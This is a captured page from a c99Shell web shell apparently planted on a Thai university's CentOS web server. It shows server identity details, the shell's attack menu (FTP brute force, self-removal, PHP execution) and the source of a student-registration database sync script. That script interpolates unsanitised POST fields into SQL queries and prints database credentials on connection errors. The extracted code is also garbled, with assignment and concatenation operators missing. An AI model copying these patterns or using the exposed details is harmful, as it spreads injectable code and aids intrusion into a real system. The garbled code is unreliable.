!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     updateDBRegist.php (36.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
//showHeader();

//include_once "../link/function.php";

?>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">


<?php

    
//function updateRegist(){
    
$acadYear $GLOBALS["ACADYEAR"];
    
$semester $GLOBALS["SEMESTER"];
    
$method $_POST['method'];
    
$formUpdate $_POST['formUpdate'];
    
$nameTable $_POST['nameTable'];
    
$uptid $_POST['uptid'];
?>
<form name="formdata" method="post" action="<?php echo $PHP_SELF;?>">
<input type="hidden" name="method" value="<?=$method?>">
<input type="hidden" name="formUpdate" value="<?=$formUpdate?>">
<input type="hidden" name="nameTable" value="<?=$nameTable?>">
<input type="hidden" name="uptid" value="<?=$uptid?>">
<table  width='740'  align='center'  border="0" cellpadding="0" cellspacing="0">
<tr><td>
<fieldset>
        <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php?mm=1">ข้อมูลพื้นฐานของระบบ</a> 
        <img src="../picture/ico3.gif" align="absmiddle" border="0">ปรับปรุงข้อมูลทะเบียนนักศึกษา.</font></legend>
<br>
    <table width="624" align="center" border="0" cellpadding="0" cellspacing="0" >
    <tr > 
      <td width="628" height="27" class="colinput1"> <div align="center"><strong>ปรับปรุงข้อมูลระบบทะเบียน</strong></div></tr>
    </table>
    <table width="624" border="0" align="center" cellspacing="1"  cellpadding="2" bgcolor = "silver">

<?php
    $ln_reg 
mysql_connect($GLOBALS['HOST'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);
    if (!
$ln_reg) {
        echo 
"<font color='#FF0000'>$source_s";
        die(
' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' mysql_error().'<br>'.$GLOBALS['HOST'].','$GLOBALS['USER_EASS'].','.$GLOBALS['PASSWORD_EASS']);
        echo 
"</font >";
    }else{
        
//echo "เชื่อมต่อฐานข้อมูล ";
        
$db_ass mysql_select_db($GLOBALS['DB_EASS'], $ln_reg);
        
//mysql_query("SET NAMES 'utf8'", $ln_info);
        
if ($db_ass) {
            
//echo ' สำเร็จ<br>';
?>
    <tr class="TableHeaderBgColor"> 
        <td height="22" align="center">ปรับปรุงข้อมูล</td>
        <td width="103" align="center">ปีการศึกษา</td>
        <td width="109" align="center">ภาคการศึกษา</td>
        <td align="center">วัน-เดือน-ปี / เวลา</td>
        <td align="center">ดำเนินการ</td>
    </tr>
<? 
        $oUT_sql 
"SELECT * FROM ".$GLOBALS['DB_EASS'].".UpdateTable LEFT JOIN ".$GLOBALS['DB_REGIST'].".rg_Term ON semester = tmId";
//echo $oUT_sql;
        
$db mysql_select_db($GLOBALS['DB_EASS'], $ln_reg);
        echo (
$db)?' ':'ไม่สามารถติดต่อฐานข้อมูล '.$GLOBALS['DB_EASS'];
        
$result mysql_query($oUT_sql);
//        echo mysql_num_rows($result);
            
$i=1;
            while (
$oUT mysql_fetch_object($result)) {
?>
   <? 
    $method 
$_POST["method"];
    if(
$method == "FormEdit$i"){ ?>
    <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_4"];?>" > 
      <td width="180" heigth = "22">&nbsp; <span class="fontMark2">*</span> <?echo $oUT->nameTable?></td>
        <td align="center">
            <? if($oUT->upTid == || $oUT->upTid == 5){?>
                <input name="inputAcadyear" type="text"  value = "<? echo $acadYear ?>" size="4" maxlength="4"  ><!-- onKeyPress="if((event.keyCode < 48 && event.keyCode !=  13) || event.keyCode > 57 ){ alert('กรอกได้เฉพาะตัวเลขเท่านั้น !!'); return false; }" -->
            <? }else{ 
                echo 
"<span class = \"fontMark4\">";
                if(
$oUT->acadYear == '0'){ echo "-"; }else{ echo $oUT->acadYear; }
                echo 
"</span>";
             } 
// end else oUT->upTid == 4?>
        </td>
        <td align="center"> 
            <? if($oUT->upTid == 4){  ?>
                <select name="selectSemester">
            <?php
                        $tm_sql 
"SELECT * FROM ".$GLOBALS['DB_REGIST'].".rg_Term";
                        
$tm_rs mysql_query($tm_sql,$ln_reg);

                        while (
$tm mysql_fetch_object($tm_rs)) {
                            if(
$tm->tmId == $semester){
echo 
"<option value=\"$tm->tmId\" selected>$tm->tmName</option>";
                                }else{
echo 
"<option value=\"$tm->tmId\">$tm->tmName</option>";
                                }
                            } 
// end while oSse ?>
                         </select> 
              <? } else { 
                     echo 
"<span class = \"fontMark4\">";
                        if(
$oUT->semester == '0' || $oUT->upTid == 5){ 
                            echo 
"-"
                        }else{  
                            echo 
$oUT->tmName;
                         }
                    echo 
"</span>";
                } 
// ?>

        </td>
        <td width="160" align="center"> 
        <? if($oUT->dateUp == '0000-00-00'){ 
                echo  
"-";
            }else{
                echo 
abbreDate2($oUT->dateUp,'/') ;
                echo 
"(".$oUT->timeUp.")";
            }
        
?>
        </td>
        <td width="80" align="center"> 
            <a href ="javascript:doFormMain(<? echo $i ?>,'<? echo $oUT->nameTable?>','<? echo $semester.'/'.$acadYear ?>')"><img src="../picture/save.gif" alt="บันทึกการอัพเดท" border="0" ></a> 
        </td>
    </tr>
    <? }else{  // for if method FormEdit ?>

      <tr class="colinput5"> 
         <td width="180" height = "22">&nbsp; <span class="fontMark2">*</span> <?echo $oUT->nameTable?></td>
          <td align="center"><? if($oUT->acadYear == '0'){ echo "-"; }else{ echo $oUT->acadYear; }?></td>
            <td align="center"><? if($oUT->semester == '0'){ 
                            echo 
"-"
                        }else{  
                            
//$oSse->SearchByKey($oUT->semester);  $oSse->GetRecord(); echo $oSse->semesterName;
                            
echo $oUT->tmName;
                     }
?>              <? //echo $oSse->semesterName; ?></td>
            <td width="160" align="center">
              <? if($oUT->dateUp == '0000-00-00'){ 
                        echo  
"-";
                   }else{
                        echo 
abbreDate2($oUT->dateUp,'/') ;
                        echo 
"(".$oUT->timeUp.")";
                    }
            
?>            </td>
            <td width="80" align="center"><a href ="javascript:doFormEdit(<? echo $i ?>)"><img src="../picture/edit1.gif" alt="แก้ไขการอัพเดท" border="0" ></a></td>
        </tr>
<?php
            
}
            
$i++;
            } 
//end while oUT

        
}else{
?>
        <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_4"];?>" > 
              <td width="180" height = "22" align='center' >
<?php
        
echo "<font color='#FF0000'>";
        echo 
"เชื่อมต่อฐานข้อมูลไม่สำเร็จ: " mysql_error();
        echo 
"</font>";
?>
        </td></tr>
<?php
        
}
    }
    
//    $numRows = mysql_num_rows($rsStd);
?>

    </table>
<table width="624" align="center" border="0">
  <tr>
    <td width="618"><font color="<?php echo $GLOBALS["COLOR_FONT_5"];?>" size="2"><u>คำแนะนำ</u> : ควรปรับปรุงข้อมูลหลังจากที่มีการเพิ่มถอนรายวิชาแล้ว </font>
    </td>
  </tr>
</table>
    <br>
<?php
    
    
// ------------  เงื่อนไขการปรับข้อมูล -------------------
    
$msgFlag 0;
    if(
$method == "FormStart"){
        
//set_time_limit(0);    
        
$flag 0;
        
$msgFlag  0;
    
/*-- update ข้อมูลนักศึกษา ทั้งหมด --*/
        
if($formUpdate == "FormStdMaster") {
            
$msgFlag =1;
            
$uptid 1;
// 1 StudentAssess = rg_StudentEduHis

            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".StudentAssess ;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                 
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".StudentAssess 
                (studentId,studentCode,levelName,programName,prefixName,studentName,studentSurname,studentPassword,studentYear) 
                SELECT stdId, stdCode, levelName, curName, prefixName, stdName, stdSurName, '' as pass, stdSyId
                FROM "
.$GLOBALS['DB_REGIST'].".rg_Student
                LEFT JOIN "
.$GLOBALS['DB_REGIST'].".rg_StudentEduHis ON sehStdId = stdId
                LEFT JOIN "
.$GLOBALS['DB_PPC'].".Level lv ON sehElvId = levelId
                LEFT JOIN "
.$GLOBALS['DB_REGIST'].".rg_Curriculum ON stdCurId = curId
                LEFT JOIN "
.$GLOBALS['DB_PPC'].".Prefix ON stdPfId = prefixId
                ORDER BY stdId;"
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

    
/*-- update ข้อมูลอาจารย์ ทั้งหมด --*/
        
}elseif($formUpdate == "FormOfficer") {
            
$msgFlag =1;
            
$uptid 2;

// 1 OfficerAssess = rg_Person
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".OfficerAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                
//die();
             
}else{
                 
// ดึงข้อมูลอาจารย์ประจำ
                 
$sql2 "INSERT INTO ".$GLOBALS['DB_EASS'].".OfficerAssess (officerId,officerCode,officerPassword,officerType
    ,prefixName,officerName,officerSurname,officerNameEng,officerSurnameEng,ofSitId,ofPicturePath )
    SELECT prsId, p.personCode, '', prsPtId, pf.prefixName
    , fName, lName, fName2, lName2, prsItId, pic
    FROM "
.$GLOBALS['DB_REGIST'].".rg_Person
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".Person p ON prsUsId = p.personId
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".PersonT pt ON prsUsId = pt.personId
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".Prefix pf ON p.prefixId = pf.prefixId
    WHERE prsItId = 1 ;"
;
                
$result mysql_query($sql2,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด INSERT INTO : '.mysql_error().'<br /></span><br />'.$sql.'<br/><br/>'.$sql2;
                die();
                }

                 
// ดึงข้อมูลอาจารย์พิเศษ
                 
$sql3 "INSERT INTO ".$GLOBALS['DB_EASS'].".OfficerAssess (officerId,officerCode,officerPassword,officerType
    ,prefixName,officerName,officerSurname,officerNameEng,officerSurnameEng,ofSitId,ofPicturePath )
    SELECT prsId, NULL, '', prsPtId, pf.prefixName
    , fName, lName, '', '', prsItId, 'photo.jpg'
    FROM "
.$GLOBALS['DB_REGIST'].".rg_Person
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".Personout p ON prsUsId = p.psoutId
    LEFT JOIN "
.$GLOBALS['DB_PPC'].".Prefix pf ON p.prefixId = pf.prefixId
    WHERE prsItId = 2 AND outtypeId = 3;"
;
                
$result mysql_query($sql3,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด INSERT INTO : '.mysql_error().'<br /></span><br />'.$sql.'<br/><br/>'.$sql2.'<br/><br/>'.$sql3;
                die();
                }
             }

// 2 ea_OFInDP = rg_PersonDepartment
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_OFInDP ;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                 
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_OFInDP (oidOfId,oidSeq,oidDpId,oidIsBoss,oidFrDate,oidToDate)
                    SELECT pdPrsId, pdSeq, pdDptId, pdIsBoss, pdFrDate, pdToDate
                    FROM "
.$GLOBALS['DB_REGIST'].".rg_PersonDepartment;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

// 3 ea_SysInstructorType = rg_InstructorType
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_SysInstructorType;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                 
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_SysInstructorType (sitId,sitName)
                    SELECT itId, itName
                    FROM "
.$GLOBALS['DB_REGIST'].".rg_InstructorType;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

// 4 ea_Department = rg_Department
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_Department;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_Department (dpId,dpName)
    SELECT dptId, dptName
    FROM "
.$GLOBALS['DB_REGIST'].".rg_Department";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

        }elseif(
$formUpdate == "FormCourse") {
            
$msgFlag 1;
            
$uptid 3;
// CoursAssess = rg_Course
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".CourseAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".CourseAssess (courseId,courseCode,courseCodeEng,courseName,courseNameEng
                ,creditTotal,credit1,credit2,period1,period2,period3,courseUnit)
                SELECT crsId, crsCode, crsCodeE, crsName, crsNameE
                , crsCreditTotal, crsCredit1, crsCredit2
                , crsPeriod1, crsPeriod2, crsPeriod3, crsUnit
                FROM "
.$GLOBALS['DB_REGIST'].".rg_Course
                ORDER BY CrsId"
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

        }elseif(
$formUpdate == "FormReg") {
            
$msgFlag 1;
            
$uptid 4;
            
$inputAcadyear $_POST["inputAcadyear"];
            
$selectSemester $_POST["selectSemester"];

// 1 ClassAssess = rg_CourseOpen
            //$sql = "DELETE FROM ".$GLOBALS['DB_EASS'].".ClassAssess;";
            
$sql 'DELETE FROM '.$GLOBALS['DB_EASS'].".ClassAssess WHERE acadYear = $inputAcadyear AND semester = $selectSemester ;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ClassAssess (classId,programId,acadYear,semester,studentYear
    ,courseId,sectionClass,section,totalSeat,enrollSeat,classTime,officerId)
    SELECT coId, coCurId, coAcY, coTmId, coSyId, coCrsId
    , coSectionClass, coSection, coNumSeatOpen, coNumSeatReg, '' as classTime, coPrsId
    FROM "
.$GLOBALS['DB_REGIST'].".rg_CourseOpen co
    WHERE coAcY = $inputAcadyear AND coTmId = $selectSemester
    GROUP BY coId;"
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                    echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                    die();
                }
             }

// 2 ClassOpenForAssess = rg_CourseOpenFor
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ClassOpenForAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ClassOpenForAssess (classId,programId,bookSeat,erSeat)
    SELECT cofCoId, cofCurId, cofSeats, cofNumEnroll
    FROM "
.$GLOBALS['DB_REGIST'].".rg_CourseOpenFor;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                    echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                    die();
                }
             }

// 3 ClassInStructorAssess = rg_TimeTable

            
$sql "DELETE cis from ".$GLOBALS['DB_EASS'].".ClassInStructorAssess cis INNER JOIN ".$GLOBALS['DB_EASS'].".ClassAssess cl ON cis.classId = cl.classId WHERE acadYear = $inputAcadyear AND semester = $selectSemester ";
//$sql = 'DELETE FROM '.$GLOBALS['DB_EASS'].'.ClassInStructorAssess ';
            
mysql_select_db($GLOBALS['DB_EASS'], $ln_reg);
            
$result mysql_query($sql);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด DELETE '.$GLOBALS['DB_EASS'].'.ClassInStructorAssess <br />QUERY : '.$sql.'<br />'.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ClassInStructorAssess (sequenceId,classId,officerId)
                    SELECT YEARWEEK( NOW( ) ) AS seq, ttCoId, ttPrsId
                    FROM "
.$GLOBALS['DB_REGIST'].".rg_TimeTable
                    INNER JOIN "
.$GLOBALS['DB_REGIST'].".rg_CourseOpen ON coId = ttCoId
                    WHERE coAcY = $inputAcadyear AND coTmId = $selectSemester
                    GROUP BY ttCoId, ttPrsId
                    ORDER BY ttCoId, ttPrsId "
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }

// 4 Registration (EnrollItem) = rg_RegisDetail
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".Registration
                    WHERE acadYear = $inputAcadyear AND semester = $selectSemester;"
;
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
mysql_error().'<br />';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".Registration
                (studentId,acadYear,semester,classId,courseId,creditAttempt)
                SELECT rdStdId, rdAcY, rdTmId, rdCoId, coCrsId, rdCreditAttempt
                FROM "
.$GLOBALS['DB_REGIST'].".rg_RegistDetails rd
                INNER JOIN "
.$GLOBALS['DB_REGIST'].".rg_CourseOpen ON rdCoId = coId
                WHERE rdAcY = $inputAcadyear AND rdTmId = $selectSemester
                ;"
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
mysql_error().'<br />';
                die();
                }
             }

// -- 5 ea_ExternalPlace = rg_ExternalPlace
// -- 6 ea_MainExternalPlace = rg_MainExternalPlace
// -- 7 ea_SubExternalPlace = rg_SubExternalPlace
            
            
$sql "SET foreign_key_checks = 0;";
            
$result mysql_query($sql,$ln_reg);
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_ExternalPlace;";
            
$result mysql_query($sql,$ln_reg);
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_MainExternalPlace;";
            
$result mysql_query($sql,$ln_reg);
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_SubExternalPlace;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_MainExternalPlace (mepId,mepName,mepPvId)
    SELECT mepId, mepName, mepPrvId
    FROM "
.$GLOBALS['DB_REGIST'].".rg_MainExternalPlace;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                }
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_SubExternalPlace (sepId,sepName)
    SELECT sepId, sepName
    FROM "
.$GLOBALS['DB_REGIST'].".rg_SubExternalPlace;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_ExternalPlace (epMepId,epSepId)
    SELECT etpMepId, etpSepId
    FROM "
.$GLOBALS['DB_REGIST'].".rg_ExternalPlace;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }
 
// -- 8 WeekDateAssess." = rg_WeekDate
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".WeekDateAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".WeekDateAssess (wdAcY,wdAcYWeekNo,wdTmId,wdTmWeekNo,wdFrDate,wdToDate)
                SELECT wdAcY,wdAcYWeekNo,wdTmId,wdTmWeekNo,wdFrDate,wdToDate
                FROM "
.$GLOBALS['DB_REGIST'].".rg_WeekDate;";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }
 
// -- 9 ea_Building = spc_Place
// -- 10 ea_Room = spc_Place
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_Room;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด DELETE ea_Room '.mysql_error().'<br /></span>';
                die();
             }

            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_Building;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด DELETE ea_Building'.mysql_error().'<br /></span>';
                die();
             }

            
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_Building (buildingId,buildingName)
                SELECT plHwId,hwName
                FROM "
.$GLOBALS['DB_PPC'].".spc_Place
                WHERE plRtId IS NULL  
                AND plBuilding IS NULL
                AND plIsDom = 'N'"
;
            
$result mysql_query($sql,$ln_reg);
            if(!
$result){
                
$msgFlag =2;
            echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
            die();
            }

            
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_Room (roomId,roomNo,buildingId,capacity)
                SELECT plHwId,plRmNo,plBuilding,plCapacity
                FROM "
.$GLOBALS['DB_PPC'].".spc_Place
                WHERE plIsRoom = 'Y'"
;
            
$result mysql_query($sql,$ln_reg);
            if(!
$result){
                
$msgFlag =2;
            echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
            die();
            }
            
$sql "SET foreign_key_checks = 1;";
            
$result mysql_query($sql,$ln_reg);
// -- 11 SysStudyTypeAssess = rg_StudyType
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".SysStudyTypeAssess;";
            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".SysStudyTypeAssess (sstId,sstName,sstNameEng,sstAbbr,sstAbbrEng)
                SELECT stId, stName, stNameE, stAbbr, stAbbrE
                FROM "
.$GLOBALS['DB_REGIST'].".rg_StudyType";
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
                }
             }
 
// -- 12 TimeTableAssess = rg_TimeTable
            
$sql "DELETE ".$GLOBALS['DB_EASS'].".TimeTableAssess FROM ".$GLOBALS['DB_EASS'].".TimeTableAssess 
                    INNER JOIN "
.$GLOBALS['DB_EASS'].".ClassAssess  ON ttClId = classId 
                    WHERE acadYear = $inputAcadyear AND semester = $selectSemester
                    ;"
;

            
$result mysql_query($sql,$ln_reg);
             if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด DELETE TimeTableAssess<br />'$sql .'<br />'.mysql_error().'<br /></span>';
                die();
             }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".TimeTableAssess (ttId,ttClId,ttWdAcYWeekNo,ttDyId,ttFrPr
                    ,ttToPr,ttOfId,ttSstId,ttTitle,ttRmId,ttEpMepId,ttEpSepId)
                    SELECT ttId,ttCoId,ttWdAcYWeekNo,ttDyId,ttPrdFrTime,ttPrdToTime
                    ,ttPrsId,ttStId,ttTitle,ttRmId,ttEtpMepId,ttEtpSepId
                    FROM "
.$GLOBALS['DB_REGIST'].".rg_TimeTable
                    INNER JOIN "
.$GLOBALS['DB_REGIST'].".rg_CourseOpen ON coId = ttCoId
                    WHERE coAcY = $inputAcadyear AND coTmId = $selectSemester
                    "
;

                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด INSERT TimeTableAssess<br />'.mysql_error().'<br /></span>';
                die();
                }
             }
            
$acadYear $inputAcadyear;
            
$semester $selectSemester ;
        }elseif(
$formUpdate == "FormEsa") { 
            
$msgFlag 1;
            
$uptid 5;

// -- 1. `ea_SaDetailProject` = esa.`sa_detail_project`
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_SaDetailProject WHERE dpj_year = $inputAcadyear;";
            
$result mysql_query($sql,$ln_reg);
            if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
            }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_SaDetailProject 
                SELECT `dpj_id`, `dpj_mpj_id`, `dpj_sub_name`, `dpj_owner`
                , `dpj_seq`, `dpj_year`, `dpj_bgY`, `dpj_code`
                FROM "
.$GLOBALS['DB_ESA'].".`sa_detail_project`
                WHERE dpj_year = $inputAcadyear 
                    AND dpj_status = 2 "
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                    echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                    die();
                }
            }

// -- 2. ea_SaMember = esa.`sa_member`
            
$sql "DELETE FROM ".$GLOBALS['DB_EASS'].".ea_SaMember WHERE mb_year = $inputAcadyear;";
            
$result mysql_query($sql,$ln_reg);
            if(!
$result){
                
$msgFlag =2;
                echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                die();
            }else{
                
$sql "INSERT INTO ".$GLOBALS['DB_EASS'].".ea_SaMember 
                SELECT `mb_id` , `mb_mpj_id` , `mb_acp_id` , `mb_std_id` , `mb_year` , `mb_tmId` , `mb_syId`
                FROM "
.$GLOBALS['DB_ESA'].".`sa_member` 
                INNER JOIN "
.$GLOBALS['DB_ESA'].".`sa_detail_project` 
                    ON dpj_id = mb_mpj_id 
                WHERE `mb_mpj_id` IS NOT NULL
                    AND dpj_year = $inputAcadyear 
                    AND dpj_status = 2 "
;
                
$result mysql_query($sql,$ln_reg);
                if(!
$result){
                    
$msgFlag =2;
                    echo 
'<span class="fontMark7">เกิดข้อผิดพลาด '.mysql_error().'<br /></span>';
                    die();
                }
            }
            
$acadYear $inputAcadyear;
        }
// End 5 case
    
}
?>    <br>
<? 
    
if($msgFlag>0) { 
        
$semester = ($uptid != 5)?$semester:'0';
        if(
$msgFlag == ) { 
            
$y date('Y');
            
$md date('m-d');
            
$dateNow = ($y+543)."-".$md;
            
$oUT_sql "UPDATE ".$GLOBALS['DB_EASS'].".UpdateTable
                        SET  acadYear = '"
.$acadYear."'
                        , semester = '"
.$semester."'
                        , dateUp = '"
.$dateNow."'
                        , timeUp = '"
.date("H:i:s")."'
                        WHERE upTid = $uptid"
;
            
$result mysql_query($oUT_sql,$ln_reg);
            
$oUT mysql_fetch_object($result);
        }
        
formSuccess($msgFlag,$nameTable);
    }
    if(
$method=='FormEnd') {
        
$oUT_sql "SELECT * FROM ".$GLOBALS['DB_EASS'].".UpdateTable 
                    WHERE upTid = "
.$uptid;
        
mysql_select_db($GLOBALS['DB_EASS'], $ln_reg);
        
$result mysql_query($oUT_sql);
        
$oUT mysql_fetch_object($result);
?>


     <table  width="477" height="55"  border="0" align="center" cellpadding="1" cellspacing="1"  bgcolor="#0080C0">
<? if($formUpdate == ) { ?>
    <tr align="center" bgcolor="#FFFFFF">
